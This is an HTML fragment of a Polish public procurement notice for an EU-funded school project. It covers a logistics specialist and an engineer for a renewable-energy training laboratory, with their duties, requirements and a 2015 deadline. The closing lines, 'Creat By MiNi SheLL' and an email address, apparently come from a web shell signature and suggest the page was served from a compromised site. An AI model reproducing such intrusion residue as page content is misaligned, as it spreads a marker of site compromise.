<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Specjalista ds. logistyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.2.1. wykonanie usługi w okresie od dnia podpisania umowy do 30.06.2015 r.  w wymiarze 1080 godzin łącznie.

2.2.2. Do obowiązków Specjalisty ds. logistyki będzie należało m.in.:
1)	Wsparcie  Szkolnego  specjalisty ds. wdrażania projektu w zakresie: rekrutacji uczestników projektu, 
przygotowania dokumentacji projektowej oraz harmonogramu zajęć pozalekcyjnych.
2)	Planowanie i podejmowanie działań logistycznych i wywiązywanie się ze wskaźników.
3)	Kontakty z pracodawcami w sprawie organizacji praktyk krajowych i staży uczniowskich.
4)	Opracowanie harmonogramu praktyk krajowych oraz staży uczniowskich.
5)	Organizacja  wizyt studyjnych w kraju oraz ich nadzór.
6)	Reagowanie w okolicznościach wymagających zmiany harmonogramu realizacji praktyk i staży uczniowskich w tym zmiany mające wpływ na zakres, cele czy rezultaty projektu.
7)	Prowadzenie sprawozdawczości w systemie PEFS.
8)	Przeprowadzanie zamówień  publicznych w związku z realizacją projektu po stronie szkoły.
9)	Uzyskiwanie pozwoleń instytucji finansujących i nadzorujących pracę szkoły niezbędnych do realizacji zadań projektowych.
10)	Współpraca z potencjalnymi kontrahentami w ramach realizacji  zadań.
11)	Prowadzenie dokumentacji i korespondencji związanej z realizacją powierzonych zadań w sposób przejrzysty, czytelny i estetyczny.
12)	Rzetelne wypełnianie dokumentacji związanej z realizacją projektu.
13)	Ścisła współpraca ze Specjalistą ds. wdrażania projektu w celu zapewnienia prawidłowej realizacji zadań. 
14)	Współpraca z zespołem projektowym w celu realizacji planowanych działań i osiągnięcia zamierzonych rezultatów.
15)	Poddanie się kontroli prowadzonej przez organy wewnętrzne i instytucje zewnętrzne w zakresie realizacji    projektu.
16)	Wymagana dyspozycyjność w siedzibie jednostki realizującej projekt w godzinach realizowanych projektowych zajęć dydaktycznych dla uczniów.

2.2.3. Wymagania: 
1)	znajomość środowiska szkoły specyfiki szkolnictwa zawodowego,
2)	praktyczna znajomość ustawy Prawo zamówień publicznych ,
3)	znajomość zasad realizowania i rozliczania projektów unijnych,
4)	znajomość dokumentów programowych POKL EFS;
5)	posiadanie pełnej zdolności do czynności prawnych oraz korzystanie z pełni praw publicznych,
6)	niekaralność,
7)	odpowiedzialność, dokładność i terminowość wykonywania powierzonych zadań
8)	umiejętność pracy w zespole, sumienność i rzetelność, dobra organizacja czasu pracy;
9)	biegła znajomość komputera w zakresie MS Word, MS Excel, Internet;

2.2.4.	 Specjalista ds. logistyki   zobowiązany będzie wykonywać przedmiot niniejszego zamówienia:
1)	w Biurze Projektu zlokalizowanym w siedzibie Zamawiającego
2)	w każdy dzień nauki szkolnej co najmniej w godzinach od 1200 do 1400, w których to godzinach Biuro Projektu będzie czynne również dla uczniów biorących udział w projekcie, 
3)	przynajmniej trzy razy w tygodniu w okresie wakacji przez 2 godziny dziennie w dniach i godzinach ustalonych i uzgodnionych z dyrektorem szkoły.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Inżynier ds. szkolnego laboratorium.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.3.1.	wykonanie usługi w okresie od dnia podpisania umowy do 30.06.2015 r.   w wymiarze 1350 godzin łącznie.

2.3.2. Do obowiązków Inżyniera ds. szkolnego laboratorium OZE będzie należało:
1)	Współpraca przy opracowaniu dokumentacji przetargowej na wyposażenie Szkolnego Laboratorium OZE, w tym generacji wiatrowej i solarnej.
2)	Współpraca z wykonawcą przy projektowaniu laboratorium generacji wiatrowej.
3)	Współpraca z wykonawcą przy projektowaniu laboratorium generacji solarnej.
4)	Koordynacja działań wykonawczych oraz nadzór techniczny nad budową Szkolnego Laboratorium OZE, w tym generacji wiatrowej i solarnej.
5)	Opracowanie dokumentacji powykonawczej Szkolnego Laboratorium OZE.
6)	Bieżąca współpraca z nauczycielami przedmiotów zawodowych i instruktorami kształcenia praktycznego w odniesieniu do potrzeb kształcenia w zakresie technologii OZE.
7)	Nadzór nad pracą związaną z opracowaniem metodyk szkoleniowych Szkolnego Laboratorium OZE.
8)	Nadzór nad pracą związaną z opracowaniem instruktarzy stanowiskowych Szkolnego Laboratorium OZE.
9)	Współudział w opracowaniu instrukcji laboratoryjnych do zajęć realizowanych w laboratorium OZE przez agendy tematyczne.
10)	Nadzór nad zakupami związanymi z wyposażeniem Szkolnego Laboratorium OZE.
11)	Współpraca przy realizacji zamówień publicznych.
12)	Wykonywanie drobnych napraw oraz prac konserwacyjnych w szkolnym laboratorium OZE,                             w tym generacji wiatrowej i solarnej.
13)	Przeszkolenie pracowników ZST w zakresie obsługi urządzeń znajdujących się w laboratorium OZE.
14)	Systematyczna współpraca ze Szkolnym specjalistą ds. wdrażania projektu oraz ze Specjalistą ds. logistyki w celu zapewnienia prawidłowego przepływu informacji.
15)	Współpraca z zespołem projektowym w celu realizacji planowanych działań i osiągnięcia zamierzonych rezultatów.
16)	Aktywne uczestnictwo i współpraca w działaniach Partnerstwa mających na celu prawidłową realizację Projektu.
17) Prowadzenie dokumentacji i korespondencji związanej z realizacją powierzonych zadań.
              18) Poddanie się kontroli prowadzonej przez organy wewnętrzne i instytucje zewnętrzne w zakresie realizacji   projektu.
19) Wymagana dyspozycyjność w siedzibie jednostki realizującej projekt w godzinach realizowanych projektowych zajęć  dydaktycznych dla uczniów.

	2.3.3. Wymagania:
1)	wykształcenie wyższe inżynierskie z przygotowaniem pedagogicznym,
2)	znajomość środowiska szkoły, specyfiki szkolnictwa zawodowego,
3)	praktyczna znajomość ustawy Prawo zamówień publicznych,
4)	znajomość zasad realizowania projektów unijnych,
5)	posiadanie pełnej zdolności do czynności prawnych oraz korzystanie z pełni praw publicznych,
6)	niekaralność,
7)	odpowiedzialność, dokładność i terminowość wykonywania powierzonych zadań
8)	umiejętność pracy w zespole, sumienność i rzetelność, dobra organizacja czasu pracy;
9)	biegła znajomość komputera w zakresie MS Word, MS Excel, Internet;

2.3.4.	Inżynier ds. szkolnego laboratorium zobowiązany będzie wykonywać przedmiot niniejszego zamówienia:
1)	w Biurze Projektu zlokalizowanym w siedzibie Zamawiającego
2)	w każdy dzień nauki szkolnej co najmniej w godzinach od 11 do 14, w których to godzinach Biuro Projektu będzie czynne również dla uczniów biorących udział w projekcie, 
3)	przynajmniej trzy razy w tygodniu w okresie wakacji przez 2 godziny dziennie w dniach i godzinach ustalonych i uzgodnionych z dyrektorem szkoły.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com